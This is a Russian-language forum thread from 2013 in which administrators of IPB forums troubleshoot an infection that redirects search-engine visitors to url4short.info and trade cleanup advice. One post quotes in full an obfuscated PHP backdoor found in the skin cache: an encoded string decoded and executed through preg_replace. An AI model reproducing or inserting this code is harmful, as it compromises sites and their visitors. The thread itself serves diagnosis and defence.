AlexAuto 1 01/03/13 19:56 решил сделать тему так как хочу уберечь других от покупки скина у Evanescence от IBSkin.xxxкупил у них скин 18 числа и сразу установил, 19 числа посещаемость упала в двое, 23 числа пользователь написал что его антивирус матерится на форум RedirDL-inf [Trj], 25 числа начал сам искать вирус, просиходит редирект на сайт xxxx://url4short.info/692f6991 при переходе с поисковиков на форум. перерыл весь движок, поменял все файлы движка, не чего не дало, в итоге попросил специалистов, несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли. посещаемость упала с 60000 до 10000, не кто не смог помочь в поисках проблемы, в итоге сегодня разобрались что все тянется со скриптов скина, скин удалили кеш почистили и все стало четко, Поделиться сообщением Ссылка на сообщение
siv1987 2628 01/03/13 22:49 Это довольно серьезное обвинение, и нужны более весомые доказательства чем "у меня на форуме нашелся вирус". Далеко не факт, что вирус поставлялся вместе с шаблонам. Вы открывали дистрибутив скина, нашли в нем злополучный скрипт? Если версия форума та, что указана в профиле, то у меня для вас "хорошие" новости... Вы в курсе событий про выходы последних патчей безопасности? 60К хостов в день?? Это таки немалая посещаемость,несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли.Такие редиректы как правило палятся очень лекго, и искать там особо нечего. Выявляется тип редиректа - серверный или жс и, исходя из типа, проводятся поиски начиная с местах где чаще всего его прописывают. Поделиться сообщением Ссылка на сообщение
AlexAuto 1 01/04/13 06:59 да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)версия IPB последняя, про безопастность вкурсе, Поделиться сообщением Ссылка на сообщение
Ritsuka 540 01/04/13 09:04 У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого? Выложите куда-нибудь и скиньте в личку ссылку на дистрибутив скина - и мне будет интересно поискать, и вам будет полезно, если окажется, что проблема все же не в скине. Поделиться сообщением Ссылка на сообщение
Fisana 700 01/04/13 09:55 У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?Это не причина не доверять.В 2008 (да и в 2009 вроде) при регистрации еще не требовалось вписывать Board URL. А еще раньше версию форума тоже не надо было указывать Поделиться сообщением Ссылка на сообщение
siv1987 2628 01/04/13 12:05 да конечно, скрипт подгружаемый по куки с другого сервераСкрипт где был обнаружен, в дистрибутиве или на рабочем форуме? Если на форуме и при этом не был проверен дистрибутив, тут говорить не о чем. То, что вредоносный скрипт оказался в исходном коде это естественно, это же жс скрипт. Это не причина не доверять.@Fisana, речь не о доверии, а о некомпетентности автора. ТС конкретно так и не указал, есть ли этот вредоносный код в дистрибутиве шаблона или нет. Поэтому здесь сложно доверять его словам. Поделиться сообщением Ссылка на сообщение
Атаман 463 01/04/13 23:39 да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)версия IPB последняя, про безопастность вкурсе, Это вирус Вашего Форума, а не шаблона. Так, как я сталкивался с этим неоднократно. Простой примерЗнакомый пишет. У меня через гугл на форум попасть не возможно, переадресовывает на другой форум. Шаблон у него стоял, который использовал красоты. (Смена цвета и тд).Взял, удалил его, и все пропало, все работает. Думаю что-то не то. Полез на фтп, в основном все файлы, включая конфиг были заражены. Прописан код Eval(6. А причина была простая, не стоит храниться пароли, в фтп менеджерах, и стоит периодически их менять. Но есть вероятность хостинг. Сообщите им. Вирусы сидят, в файлах с расширение php, но лучше проверить все. Примеры, где я чистил.conf_global.php/cache/skin_cache/cache/lang_cache/hooks/ips_kernel/public/style_images/ (Ваш шаблон). В моем случае, в папке с шаблонов было много php файлов, и все заражены. Можно ssh поиском, чтобы обнаружить в каких файлах используется этот вредоносный код. Поделиться сообщением Ссылка на сообщение
mizer 1 01/05/13 12:38 (изменено) Читать: http://forums.odforce.net/index.php?/topic/16575-rss-feeds-link-problem/ У меня данная зараза сидела в кеше шаблона cache/skin_cache/что-то_там_1/skin_global.php (по памяти). В середине файла идет код инклуда JS (легче сделать поиск по переменной $mds ) Последний патч устраняет дыру. Я не специалист, но по моему, также перестройка кеша удалит все. Изменено 5 января 2013 пользователем mizer Поделиться сообщением Ссылка на сообщение
Jet 0 01/11/13 16:30 Да, бяда. Такая же проблема. Появилась еще в декабре. Редирект на вышеуказанный сайт. Думал что почистил, но сейчас проверил, редирект снова стал проявляться. Вот вишь засада, и как его вынести полностью? Может кто напишет подробно как с сей напастью бороться, искать зараженные файлы? Поделиться сообщением Ссылка на сообщение
siv1987 2628 01/11/13 16:33 Искать шеллы.Сменить пароли (бд, можно фтп).Читать соответствующие топики на форуме где эта тема обсуждалась уже не один раз. Поделиться сообщением Ссылка на сообщение
Jet 0 01/11/13 20:35 Ну эт понятно. Я рассчитывал больше на подробности, ну ладно, кто ищет собсно, тот найдет. В файле /cache/skin_cache/cacheid_Х/skin_global.php нашел лишнее:$k='bf05f0304ee14efae6ce9165e0a2c194'; $mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[bs/uBvR(wvzgBgP[bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[bZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq'; $jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6'; $jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@'; $i='#c#'.substr($mds,213,1); $ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css'); Я так понимаю это и есть шелл? Поделиться сообщением Ссылка на сообщение
siv1987 2628 01/12/13 16:27 Да, это и есть одна из его разновидностей. Перестройте кеш, чтобы убедится что код находился только в кеше а не в шаблоне, иначе при перестроении он снова появится. Поделиться сообщением Ссылка на сообщение
Jet 0 01/13/13 18:48 Да, кэш перестроил, код пропал. Пока вродь не редиректит. Поделиться сообщением Ссылка на сообщение
pasha_d 0 01/18/13 23:00 Блин, та же беда. Подскажите плс лоху. Этот код надо найти через админку в файлах и стереть целиком или там есть какие заморочки и лохам лучче не соваца?С уважением Поделиться сообщением Ссылка на сообщение
georg2030 0 02/16/13 14:12 Точно такая же проблема, уже все файлы на все возможные совпадения проверил, всю базу, вообще все что можно. Убираю код из skin_global.php и через некоторое время он снова перезаписывается :( Поделиться сообщением Ссылка на сообщение